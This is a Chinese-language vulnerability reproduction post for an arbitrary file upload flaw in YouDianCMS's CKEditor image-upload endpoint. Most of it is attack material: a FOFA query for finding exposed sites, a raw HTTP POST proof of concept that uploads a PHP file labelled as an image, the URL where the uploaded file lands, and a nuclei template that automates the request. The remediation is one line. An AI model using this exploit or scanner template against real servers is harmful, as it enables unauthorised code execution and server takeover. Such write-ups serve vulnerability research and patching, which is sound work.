YouDianCMS 友点系统 CKEditor 任意文件上传_ckeditor漏洞

YouDianCMS 友点系统 CKEditor 任意文件上传漏洞复现

1.漏洞介绍

友点CMS存在任意文件上传漏洞，攻击者通过漏洞可以上传恶意文件，获取服务器权限

2.漏洞编号

3.影响范围

4.检索特征

FOFA：app=“友点建站-CMS” && product=“友点建站-CMS”

5.POC

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Content-Length: 185
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2

--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg

<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

http://127.0.0.1/Public/image/uploads/1709524862134.php

nuclei脚本

id: YouDianCMS-upload

info:
  name: YouDianCMS-upload
  author: test
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |
        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: close
        Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
        Host: {{Hostname}}
        Content-Length: 179

        --cadc403efc1ad12f5fcce44c172baad2
        Content-Disposition: form-data; name="files"; filename="c.php"
        Content-Type: image/jpg

        <?php phpinfo();?>
        --cadc403efc1ad12f5fcce44c172baad2--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 
      - type: status
        status:
          - 200

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

6.修复建议

更新到最新版本

7.参考信息

https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA